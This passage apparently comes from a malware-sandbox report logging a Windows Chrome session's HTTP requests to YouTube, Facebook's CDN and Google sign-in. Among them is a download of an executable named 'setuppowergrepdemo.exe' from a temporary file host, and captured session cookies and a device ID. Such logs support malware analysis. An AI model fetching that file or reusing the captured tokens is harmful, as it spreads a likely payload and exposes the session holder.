Source: global traffic	HTTP traffic detected: GET /s/desktop/80338919/jsbin/intersection-observer.min.vflset/intersection-observer.min.js HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: VISITOR_PRIVACY_METADATA=CgJERRIEEgAgRQ%3D%3D; CONSENT=PENDING+538; __Secure-YEC=CgtiU1BPUHlZdVg5ZyiMyKGtBjIKCgJERRIEEgAgRQ%3D%3D
Source: global traffic	HTTP traffic detected: GET /s/desktop/80338919/jsbin/scheduler.vflset/scheduler.js HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: VISITOR_PRIVACY_METADATA=CgJERRIEEgAgRQ%3D%3D; CONSENT=PENDING+538; __Secure-YEC=CgtiU1BPUHlZdVg5ZyiMyKGtBjIKCgJERRIEEgAgRQ%3D%3D
Source: global traffic	HTTP traffic detected: GET /rsrc.php/v3i7M54/yU/l/en_US/NJVgMHwCLBZ.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rsrc.php/v3/yx/r/GIlJjyzEguQ.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rsrc.php/v3/yK/r/Lzd-U--zeLf.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /s/desktop/80338919/jsbin/www-i18n-constants-en_US.vflset/www-i18n-constants.js HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: VISITOR_PRIVACY_METADATA=CgJERRIEEgAgRQ%3D%3D; CONSENT=PENDING+538; __Secure-YEC=CgtiU1BPUHlZdVg5ZyiMyKGtBjIKCgJERRIEEgAgRQ%3D%3D
Source: global traffic	HTTP traffic detected: GET /security/hsts-pixel.gif HTTP/1.1Host: facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sb=CmSoZXuzKcF1rAq_PIc_YoJb; fr=0BIGGuZwPUjIULfOD..BlqGQK.-A.AAA.0.0.BlqGQM.AWXfYTWBBsg
Source: global traffic	HTTP traffic detected: GET /rsrc.php/v3/yU/r/O7nelmd9XSI.png HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://static.xx.fbcdn.net/rsrc.php/v3/yN/l/0,cross/z8iN9p2rYBG.css?_nc_x=Ij3Wp8lg5KzAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /s/desktop/80338919/jsbin/www-tampering.vflset/www-tampering.js HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: VISITOR_PRIVACY_METADATA=CgJERRIEEgAgRQ%3D%3D; CONSENT=PENDING+538; __Secure-YEC=CgtiU1BPUHlZdVg5ZyiMyKGtBjIKCgJERRIEEgAgRQ%3D%3D
Source: global traffic	HTTP traffic detected: GET /s/desktop/80338919/jsbin/spf.vflset/spf.js HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: VISITOR_PRIVACY_METADATA=CgJERRIEEgAgRQ%3D%3D; CONSENT=PENDING+538; __Secure-YEC=CgtiU1BPUHlZdVg5ZyiMyKGtBjIKCgJERRIEEgAgRQ%3D%3D
Source: global traffic	HTTP traffic detected: GET /s/desktop/80338919/jsbin/network.vflset/network.js HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: VISITOR_PRIVACY_METADATA=CgJERRIEEgAgRQ%3D%3D; CONSENT=PENDING+538; __Secure-YEC=CgtiU1BPUHlZdVg5ZyiMyKGtBjIKCgJERRIEEgAgRQ%3D%3D
Source: global traffic	HTTP traffic detected: GET /rsrc.php/v3/yB/r/Y0L6f5sxdIV.png HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://static.xx.fbcdn.net/rsrc.php/v3/y1/l/0,cross/ZMAH_LE0voZ.css?_nc_x=Ij3Wp8lg5KzAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rsrc.php/v3/yq/r/6bjw9N12j0I.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rsrc.php/v3/ym/r/RxPOZF3XHzp.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rsrc.php/v3/yr/r/bHmuPlLj85H.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rsrc.php/v3/y2/r/3FPJ9YC_wUr.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rsrc.php/v3/yC/r/M08arqdo_nN.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rsrc.php/v3/yE/r/_BJqgRg0BU5.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en HTTP/1.1Host: accounts.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=ce97e620-e5c8-47da-b1c2-66080ca9ba90,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg
Source: global traffic	HTTP traffic detected: GET /rsrc.php/v3/yz/r/lFK_RCKM9IT.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rsrc.php/v3/yp/r/sKtrEJAtiUM.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en HTTP/1.1Host: accounts.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=ce97e620-e5c8-47da-b1c2-66080ca9ba90,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg
Source: global traffic	HTTP traffic detected: GET /InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en&passive=true&service=youtube&uilel=3&ifkv=ASKXGp1o4g93R-3NyvrkXhTJ2DkwuFnIwuGMhH2_vln4ixRd8AUb_60tYpVg-FxGwW5DIsnFNxHUDw HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=ce97e620-e5c8-47da-b1c2-66080ca9ba90,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"Referer: https://www.youtube.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg
Source: global traffic	HTTP traffic detected: GET /rsrc.php/v3/yv/r/qvzskUrYlYC.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rsrc.php/v3/yU/r/I33XAWfgyPZ.js?_nc_x=Ij3Wp8lg5Kz HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dl/3900221/setuppowergrepdemo.exe HTTP/1.1Host: tmpfiles.org
Source: global traffic	HTTP traffic detected: GET /v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en&ifkv=ASKXGp1c0w5JaOfQYOlZuhQy86GoReFUxlHNL6-vwhawIMLsBG8McXpezbH0g-jF4-w_0KUlWLbG&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1259196525%3A1705534498192643&theme=glif HTTP/1.1Host: accounts.google.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7X-Chrome-ID-Consistency-Request: version=1,client_id=77185425430.apps.googleusercontent.com,device_id=ce97e620-e5c8-47da-b1c2-66080ca9ba90,signin_mode=all_accounts,signout_mode=show_confirmationX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"Referer: https://www.youtube.com/Accept-Encoding: 